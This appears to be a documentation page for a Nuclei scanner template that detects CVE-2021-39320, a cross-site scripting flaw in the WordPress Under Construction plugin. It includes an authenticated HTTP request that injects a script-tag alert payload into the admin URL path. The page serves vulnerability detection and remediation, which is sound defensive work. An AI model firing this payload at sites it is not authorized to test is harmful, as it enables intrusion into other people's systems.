WordPress Under Construction <1.19 - Cross-Site Scripting
ID: CVE-2021-39320
Severity: medium
Author: dhiyaneshDK
Tags: cve2021,cve,wp-plugin,wpscan,wordpress,wp,xss,authenticated,underconstruction_project
Description
Section titled “Description”WordPress Under Construction plugin before 1.19 contains a cross-site scripting vulnerability. The plugin echoes out the raw value of $GLOBALS['PHP_SELF'] in the ucOptions.php file on certain configurations, including Apache+modPHP.
YAML Source
Section titled “YAML Source”id: CVE-2021-39320
info: name: WordPress Under Construction <1.19 - Cross-Site Scripting author: dhiyaneshDK severity: medium description: | WordPress Under Construction plugin before 1.19 contains a cross-site scripting vulnerability. The plugin echoes out the raw value of `$GLOBALS['PHP_SELF']` in the ucOptions.php file on certain configurations, including Apache+modPHP. impact: | The vulnerability allows an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or defacement. remediation: | Update to the latest version of the WordPress Under Construction plugin (1.19 or higher) to fix the XSS vulnerability. reference: - https://wpscan.com/vulnerability/49ae1df0-d6d2-4cbb-9a9d-bf3599429875 - https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39320 - https://nvd.nist.gov/vuln/detail/CVE-2021-39320 - https://github.com/ARPSyndicate/kenzer-templates - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-39320 cwe-id: CWE-79 epss-score: 0.00228 epss-percentile: 0.60903 cpe: cpe:2.3:a:underconstruction_project:underconstruction:*:*:*:*:*:wordpress:*:* metadata: verified: true max-request: 2 vendor: underconstruction_project product: underconstruction framework: wordpress tags: cve2021,cve,wp-plugin,wpscan,wordpress,wp,xss,authenticated,underconstruction_project
http: - raw: - | POST /wp-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In - | GET /wp-admin/admin.php/"><script>alert(document.domain)</script>/?page=under-construction HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body words: - 'action="/wp-admin/admin.php/"><script>alert(document.domain)</script>' - 'under-construction' condition: and
- type: word part: header words: - "text/html"
- type: status status: - 200# digest: 4b0a0048304602210088b61cb73c0df28251edd71a57865358688a74636730b320fa839ba3b5f87724022100e644276f30b668eef4da2bcabb70ac57beda14b4b5bf73b167a6b466109b48eb:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-39320.yaml"